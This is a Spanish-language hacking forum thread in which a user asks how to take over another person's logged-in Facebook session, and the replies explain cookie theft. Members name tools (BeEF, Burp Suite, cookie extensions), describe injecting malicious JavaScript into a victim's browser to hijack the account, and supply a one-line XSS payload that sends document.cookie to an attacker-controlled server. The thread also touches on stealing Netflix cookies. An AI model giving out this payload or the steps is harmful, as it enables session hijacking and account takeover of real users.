Hola, me gustaría saber como "captar" las sesiones de cookie ya hechas. Se puede hacer con alguna herramienta.
O sea, yo tengo ya en el Chrome iniciado el facebook, como hago para captar esa sesión ya iniciada o eliminar esos cookie para que lo vuelva a colocar.
No sé si me explico.
Saludos.
Se puede desde el navegador colega, o creo con beef puedes capturar
Enviado desde mi SM-G928T mediante Tapatalk
burp suite, te lo facilita tambien y un borrado en el propio navegador
Si quieres obtener la cookie solo tienes que ejecutar una línea de javascript
var cookie = document.cookie
Luego con eso ya puedes imaginarte la de miles de cosas que puedes hacer, solo es pensar
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Hola, me gustaría saber como "captar" las sesiones de cookie ya hechas. Se puede hacer con alguna herramienta.
O sea, yo tengo ya en el Chrome iniciado el facebook, como hago para captar esa sesión ya iniciada o eliminar esos cookie para que lo vuelva a colocar.
No sé si me explico.
Saludos.
Pasate por aquí: https://underc0de.org/foro/hacking/obtener-credenciales-https-con-bettercap-y-sslstrip/
Gracias por leer!
DUDA
Hola!
Antes que nada te recomiendo el taller de seguridad web (al menos el número #1) https://underc0de.org/foro/talleres-underc0de-213/taller-de-seguridad-web-1/ dónde se trata el tema del robo de cookies mediante javascript.
Llegados a este punto y puesto a que en tu caso tienes acceso directo al pc, es bastante simple y puedes utilizar cualquier método de los que hay en la siguiente lista:
- Utilizar una extensión del navegador, donde simplemente deberás buscarla y coger lo que necesites. Puedes utilizar cualquiera de estas: https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=es-419 o https://chrome.google.com/webstore/detail/cookies/iphcomljdfghbkdcfndaijbokpgddeno
- Como ya han comentado, puedes utilizar BurpSuite, interceptar la petición (o mirando el historial del proxy) y coger las cookies.
- También puedes acceder a la consola del navegador, (Control + Shift + I), ir a la pestaña Network, realizar cualquier petición y consultar la cookie.
- O como última opción (ya comentada), entrar a la consola, (Control + Shift + I), ir a la pestaña Console, y ejecutar "document.cookie"
Espero haberte ayudado,
Un saludo.
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Hola, me gustaría saber como "captar" las sesiones de cookie ya hechas. Se puede hacer con alguna herramienta.
O sea, yo tengo ya en el Chrome iniciado el facebook, como hago para captar esa sesión ya iniciada o eliminar esos cookie para que lo vuelva a colocar.
No sé si me explico.
Saludos.
para ver la cookie abris la consola de chrome y escribis document.cookie
para borrarla, muchas veces alcanza con desloguearte de la web. Si no, abris la consola y pones document.cookie=''
Eso ultimo no lo probé, pero creo que funciona
Haber si me entero jeje. Sería borrar cookie del navegador de la victima no de mi navegador o estando en el navegador de la victima. Se puede si o no? Muchas gracias.
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Haber si me entero jeje. Sería borrar cookie del navegador de la victima no de mi navegador o estando en el navegador de la victima. Se puede si o no? Muchas gracias.
Lo primero que tienes que entender es que javascript es un lenguaje de lado del cliente, es decir, se ejecuta en tu navegador. Tu objetivo sería hacerte con la cookie de tu víctima, ya sea usando alguna herramienta anteriormente mencionada o inyectando tu un simple js malicioso y haciendo que tu víctima lo ejecute en su navegador. Después cogerías tu sesión y cambiarías la cookie a la de tu víctima para gozar de sus mismos privilegios, es decir si tu victima tiene una cuenta llamada Pepito, si utilizas su cookie pasarías a estar logeado en la cuenta Pepito sin necesidad de poner la contraseña
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Haber si me entero jeje. Sería borrar cookie del navegador de la victima no de mi navegador o estando en el navegador de la victima. Se puede si o no? Muchas gracias.
Lo primero que tienes que entender es que javascript es un lenguaje de lado del cliente, es decir, se ejecuta en tu navegador. Tu objetivo sería hacerte con la cookie de tu víctima, ya sea usando alguna herramienta anteriormente mencionada o inyectando tu un simple js malicioso y haciendo que tu víctima lo ejecute en su navegador. Después cogerías tu sesión y cambiarías la cookie a la de tu víctima para gozar de sus mismos privilegios, es decir si tu victima tiene una cuenta llamada Pepito, si utilizas su cookie pasarías a estar logeado en la cuenta Pepito sin necesidad de poner la contraseña
Y sabes de algún js ya montado para este menester
?
O más o menos como montarlo. Estoy pegado en esto de la programación como bien sabes :D
Pues con lo que te he respondido antes podrías hacerte una idea. Con document.cookie te devuelve el valor de la cookie, solo tienes que enviarlo desde el navegador de la victima a algun lugar controlado por ti para almacenar la cookie.
En google hay cientos de miles de ejemplos, no es necesario perder tiempo reinventando la rueda.
Con hacer una petición post con el valor de la cookie a un servidor tuyo basta. Por ejemplo
document.write('<img src="https://tuserver.com/receptor.php?cookie='+document.cookie+'"/>')
Esta es una de las técnicas más típicas, sabiendo un poco de javascript solo es cuestión de pensar y ser creativo ^^
Ejecuta el document.cookie como te están diciendo en la consola.
Me estaba preguntando si se podía hacer un programa maligno que te extraiga las cookies de un navegador, he visto que publican muchas cookies de usuarios de Netflix para ver Netflix gratis, cómo las robarán??
Acá te dejo un taller completo que habla sobre como capturar cookies
https://underc0de.org/foro/talleres-underc0de-213/taller-de-seguridad-web-1/
Saludos,
ANTRAX